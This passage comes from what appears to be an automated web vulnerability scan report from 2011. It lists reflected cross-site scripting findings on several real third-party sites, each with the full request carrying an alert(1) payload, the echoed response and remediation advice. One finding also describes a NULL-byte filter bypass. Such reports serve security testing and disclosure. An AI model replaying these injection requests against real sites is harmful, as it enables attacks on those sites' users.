GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D21341037515fa3a"%3balert(1)//ba80aca61be&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:56:25 GMT Server: Apache Last-Modified: Fri, 21 May 2010 00:13:06 GMT ETag: "3ecbcf-c0b-4870f8e26a880" Accept-Ranges: bytes Content-Length: 10066 Content-Type: application/x-javascript
document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
if( navigator ...[SNIP]... 0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3Dhttp://altfarm.mediaplex.com/ad/ck/3484-103250-2056-0?mpt=21341037515fa3a";alert(1)//ba80aca61be\" target=\"_blank\"> ...[SNIP]...
2.47. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpvc parameter]
Summary
Severity: High
Confidence: Certain
Host: http://img.mediaplex.com
Path: /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9293a"%3balert(1)//ef5b805385b was submitted in the mpvc parameter. This input was echoed as 9293a";alert(1)//ef5b805385b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D9293a"%3balert(1)//ef5b805385b HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:56:27 GMT Server: Apache Last-Modified: Fri, 21 May 2010 00:13:06 GMT ETag: "3ecbcf-c0b-4870f8e26a880" Accept-Ranges: bytes Content-Length: 10042 Content-Type: application/x-javascript
document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
if( navigator ...[SNIP]... ZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3D9293a";alert(1)//ef5b805385bhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&clickTag=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIK ...[SNIP]...
2.48. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ips-invite.iperceptions.com
Path: /webValidator.aspx
Issue detail
The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0049fa0'%3balert(1)//a0cbc58a018 was submitted in the loc parameter. This input was echoed as 49fa0';alert(1)//a0cbc58a018 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /webValidator.aspx?sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0'%3balert(1)//a0cbc58a018&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1 Host: ips-invite.iperceptions.com Proxy-Connection: keep-alive Referer: http://www.frontier.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Srv-By: IPS-INVITE02 P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA" Date: Tue, 06 Sep 2011 12:46:59 GMT Content-Length: 1330
var sID= '937'; var sC= 'IPE937';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY.49fa0';alert(1)//a0cbc58a018'; var ps='sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0%27%3balert(1)%2f%2fa0cbc58a018&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite' ...[SNIP]...
2.49. http://postcalc.usps.gov/CombineScriptsHandler.ashx [_TSM_HiddenField_ parameter]
Summary
Severity: High
Confidence: Certain
Host: http://postcalc.usps.gov
Path: /CombineScriptsHandler.ashx
Issue detail
The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c214d'%3balert(1)//ba0b57bcc30 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as c214d';alert(1)//ba0b57bcc30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CombineScriptsHandler.ashx?_TSM_HiddenField_=ctl00_ToolkitScriptManager1_HiddenFieldc214d'%3balert(1)//ba0b57bcc30&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.11119.20010%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3af115bb7c-9ed9-4839-b013-8ca60f25e300%3ae2e86ef9%3a1df13a87%3afde3863c%3aa9a7729d%3a9ea3f0e2%3a9e8e87e9%3a4c9865be%3aba594826%3a507fcf1b%3ac7a4182e HTTP/1.1 Host: postcalc.usps.gov Proxy-Connection: keep-alive Referer: http://postcalc.usps.gov/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NSC_qptudbmdfb_80=ffffffff3b223e1e45525d5f4f58455e445a4a421548
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: application/x-javascript Content-Length: 161049 Vary: Accept-Encoding Cache-Control: public, max-age=3583 Expires: Tue, 06 Sep 2011 13:52:50 GMT Date: Tue, 06 Sep 2011 12:53:07 GMT Connection: close
//START AjaxControlToolkit.Common.Common.js Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() { } AjaxControlToolkit.BoxSide.prototype = { Top : 0, Right : 1,
...[SNIP]... /END AjaxControlToolkit.Calendar.CalendarBehavior.js if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded(); (function() {var fn = function() {$get('ctl00_ToolkitScriptManager1_HiddenFieldc214d';alert(1)//ba0b57bcc30').value += ';;AjaxControlToolkit, Version=1.0.11119.20010, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:f115bb7c-9ed9-4839-b013-8ca60f25e300:e2e86ef9:1df13a87:fde3863c:a9a7729d:9ea3f0e2:9e8e ...[SNIP]...
2.50. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]
Summary
Severity: High
Confidence: Certain
Host: http://query.yahooapis.com
Path: /v1/public/yql/uhTrending/cokeTrending2
Issue detail
The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 155ee<script>alert(1)</script>7012a81052a was submitted in the limit parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1155ee<script>alert(1)</script>7012a81052a HTTP/1.1 Host: query.yahooapis.com Proxy-Connection: keep-alive Referer: http://omg.yahoo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Access-Control-Allow-Origin: * Content-Type: text/javascript;charset=utf-8 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 12:45:34 GMT Server: YTS/1.19.8 Age: 0 Proxy-Connection: keep-alive Content-Length: 178
YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1155ee<script>alert(1)</script>7012a81052a'"}});
2.51. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
Summary
Severity: High
Confidence: Firm
Host: http://sales.liveperson.net
Path: /visitor/addons/deploy.asp
Issue detail
The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 8a937%0a857122958df was submitted in the site parameter. This input was echoed as 8a937
857122958df in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /visitor/addons/deploy.asp?site=218075578a937%0a857122958df&d_id=scottrade HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:49:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT Content-Length: 2141 Content-Type: application/x-javascript Set-Cookie: ASPSESSIONIDASQRDBTD=EKEPPJLBDDNCLJEIBDBOFDGL; path=/ Cache-control: public, max-age=3600, s-maxage=3600
//Plugins for site 218075578a937 857122958df lpAddMonitorTag(); typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem ...[SNIP]...
2.52. http://show.partners-z.com/s/show [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://show.partners-z.com
Path: /s/show
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae04b<script>alert(1)</script>6304665d48a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/show?chan=YAHOO&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&uuid=3c7f76504307f88c4e126d344670b7cc&zip=10010&ae04b<script>alert(1)</script>6304665d48a=1 HTTP/1.1 Host: show.partners-z.com Proxy-Connection: keep-alive Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 12:50:18 GMT Server: Apache/2.2.9 (Debian) Cache-Control: max-age=0, no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 892 Content-Type: text/html; charset=UTF-8
<html><head></head><body style="width:300px;height:200px;overflow:hidden;border:0px;margin:5px;text-align:center"><div id="haiku" style="height:3em;position:relative;top:50%;margin-top:-2em; color:#D2 ...[SNIP]... ces/showcase-display-server-1.4.12/server/param_mapper.py", line 121, in convert_params raise InvalidParameterException ("unknown parameter (%s)" % k) InvalidParameterException: unknown parameter (ae04b<script>alert(1)</script>6304665d48a) </div> ...[SNIP]...
2.53. http://utdi.reachlocal.com/coupon/ [cid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e78be"><script>alert(1)</script>08a96ad64a0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:52:47 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 3069 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... <frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2 ...[SNIP]...
2.54. http://utdi.reachlocal.com/coupon/ [dynamic_proxy parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cf04"><script>alert(1)</script>7fa24af02aa was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:04 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 3079 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:56 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... <frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" nam ...[SNIP]...
2.55. http://utdi.reachlocal.com/coupon/ [kw parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdd5"><script>alert(1)</script>2b246827237 was submitted in the kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:00 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 3069 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:52 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... <frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" ...[SNIP]...
2.56. http://utdi.reachlocal.com/coupon/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62459"><script>alert(1)</script>8a2698860bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1 HTTP/1.1 Host: utdi.reachlocal.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 11:53:18 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Vary: Accept-Encoding Content-Length: 3087 Content-Type: text/html Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>UTDI (san francisco,CA)</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> ...[SNIP]... 971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1&rl_track_landing_pages=1" name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0 noresize frameborder="no" scrolling="NO"> ...[SNIP]...
2.57. http://utdi.reachlocal.com/coupon/ [primary_serv parameter]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.com
Path: /coupon/
Issue detail
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db859"><script>alert(1)</script>c1c2d326329 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
